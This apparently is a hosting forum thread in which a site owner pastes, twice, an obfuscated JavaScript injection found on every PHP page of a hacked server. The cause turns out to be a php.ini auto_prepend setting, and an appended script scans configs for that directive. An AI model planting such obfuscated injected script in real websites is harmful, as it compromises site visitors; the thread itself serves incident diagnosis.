Serious Security problem in my server

  • Serious Security problem in my server

    Hi, I am a good WHUK customer and I was planning to move some accounts from another old server of mine. But before managing to transfer my accounts to my new WHUK server, my old server was hacked!

    It is very weird: this JavaScript appears at the top of all PHP pages on the server, without (!?) being inserted in these pages:

    <script language="javascript" type="text/javascript">var j="",i=32,e="e:<sotb>lf;ugmyzvnawr0/i.ph? c=d",s="";eval(unescape("%66%75%6E%63%74%69%6F%6E% 20%20%74%28%6D%20%29%7B%20%76%61%72%20%63%3D%27%27 %2C%75%2C%64%20%2C%62%2C%77%3B%20%66%6F%72%28%75%3 D%31%3B%20%75%3C%3D%20%6D%2E%6C%65%6E%67%74%68%3B% 75%2B%2B%29%20%7B%64%3D%6D%2E%63%68%61%72%41%74%28 %20%75%2D%31%2B%31%2D%31%29%3B%62%3D%65%2E%69%6E%6 4%65%78%4F%66%28%20%64%29%3B%20%69%66%28%62%3E%2D% 31%2B%31%2D%31%29%7B%77%3D%20%28%28%62%2B%33%2D%32 %29%25%20%69%2D%31%29%3B%69%66%28%20%77%3C%3D%20%3 0%2B%32%2D%32%29%7B%77%2B%3D%69%20%7D%63%2B%3D%65% 2E%63%68%61%72%41%74%28%77%2D%32%2B%31%29%7D%65%6C %73%65%20%7B%63%2B%3D%64%7D%7D%20%73%2B%3D%63%20%7 D%3B%66%75%6E%63%74%69%6F%6E%20%61%61%61%28%29%7B% 20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73 %29%3B%6A%3D%22%22%7D"));t("cccccccccccccccccccccc ccs.;0wy:co0=d'?bbh<iiv=tgab:0p=aigo:0i.ap=m. e:;wgfb'cr.eb?d'/'c?:.m?bd'/'cobzf:d'n.o.>.f.bz<c?.ee:au'lsi.;0wy:lc");aaa();d ocument.write(j);j="";</script>
    It seems that this malicious code was inserted somewhere globally on my server and I do not know where. As I said, this JavaScript code is not located inside my PHP files, so I do not know how to remove it. Can you help me?

  • #2
    This is the malicious code:

    [PHP]<script language="javascript" type="text/javascript">var j="",i=32,e="e:<sotb>lf;ugmyzvnawr0/i.ph? c=d",s="";eval(unescape("%66%75%6E%63%74%69%6F%6E% 20%20%74%28%6D%20%29%7B%20%76%61%72%20%63%3D%27%27 %2C%75%2C%64%20%2C%62%2C%77%3B%20%66%6F%72%28%75%3 D%31%3B%20%75%3C%3D%20%6D%2E%6C%65%6E%67%74%68%3B% 75%2B%2B%29%20%7B%64%3D%6D%2E%63%68%61%72%41%74%28 %20%75%2D%31%2B%31%2D%31%29%3B%62%3D%65%2E%69%6E%6 4%65%78%4F%66%28%20%64%29%3B%20%69%66%28%62%3E%2D% 31%2B%31%2D%31%29%7B%77%3D%20%28%28%62%2B%33%2D%32 %29%25%20%69%2D%31%29%3B%69%66%28%20%77%3C%3D%20%3 0%2B%32%2D%32%29%7B%77%2B%3D%69%20%7D%63%2B%3D%65% 2E%63%68%61%72%41%74%28%77%2D%32%2B%31%29%7D%65%6C %73%65%20%7B%63%2B%3D%64%7D%7D%20%73%2B%3D%63%20%7 D%3B%66%75%6E%63%74%69%6F%6E%20%61%61%61%28%29%7B% 20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73 %29%3B%6A%3D%22%22%7D"));t("cccccccccccccccccccccc ccs.;0wy:co0=d'?bbh<iiv=tgab:0p=aigo:0i.ap=m. e:;wgfb'cr.eb?d'/'c?:.m?bd'/'cobzf:d'n.o.>.f.bz<c?.ee:au'lsi.;0wy:lc");aaa();d ocument.write(j);j="";</script>[/PHP]

    • #3
      Please let us know the Server IP which was compromised so that we can have a look at it. Also let me know the registered email address you used while placing the order.
      UK VPS Hosting || Managed Server Hosting || Reseller Hosting
      Webhosting affiliate program can make you earn up to 300 Webhosting UK Affiliate

      • #4
        There was a php.ini problem with auto_prepend. Now it's OK.

        • #5
          Good to know. Feel free to contact us if you need any kind of further assistance or help.
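Post #4 traces the injected script to an auto_prepend setting in php.ini; PHP runs the file named by `auto_prepend_file` before every script, so its output shows up on every page without any page being edited. As an added example (not from the thread or from the hosting provider), this Python script scans a directory tree for active `auto_prepend_file` and `auto_append_file` settings in php.ini-style files, `.user.ini`, `.htaccess` and Apache `.conf` files. The list of file names and the sample path are assumptions.

```python
import os
import re
import sys
import tempfile

# Directives that make PHP execute an extra file before/after every script.
DIRECTIVE = re.compile(r"""
    ^\s*(?:php_(?:admin_)?value\s+)?   # Apache form: php_value <name> <value>
    (auto_(?:prepend|append)_file)     # directive name
    \s*(?:=|\s)\s*                     # php.ini uses '=', Apache uses whitespace
    ["']?([^"'\s;\#]*)                 # value, with an optional opening quote
    """, re.IGNORECASE | re.VERBOSE)
# File names that can carry PHP settings (assumed list; extend for your setup).
CONFIG_NAMES = re.compile(r"^(php.*\.ini|\.user\.ini|\.htaccess|.*\.conf)$", re.I)


def scan_file(path):
    """Return (path, line_no, directive, value) for each active directive."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line_no, line in enumerate(fh, 1):
            if line.lstrip().startswith((";", "#")):
                continue  # commented-out setting
            m = DIRECTIVE.match(line)
            # An empty value or "none" means the directive is switched off.
            if m and m.group(2).lower() not in ("", "none"):
                hits.append((path, line_no, m.group(1).lower(), m.group(2)))
    return hits


def scan_tree(root):
    """Walk root and scan every file whose name can hold PHP settings."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if CONFIG_NAMES.match(name):
                hits.extend(scan_file(os.path.join(dirpath, name)))
    return hits


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else tempfile.mkdtemp()
    if len(sys.argv) == 1:  # no path given: scan a constructed sample instead
        with open(os.path.join(root, "php.ini"), "w") as fh:
            fh.write("; constructed sample\nauto_prepend_file = /tmp/sample.php\n")
    for path, line_no, name, value in scan_tree(root):
        state = "exists" if os.path.isfile(value) else "missing"
        print(f"{path}:{line_no}: {name} -> {value} ({state})")
```

Any hit that the site owner did not configure deserves a look at both the setting and the file it points to, since removing only the setting leaves the prepended file on disk.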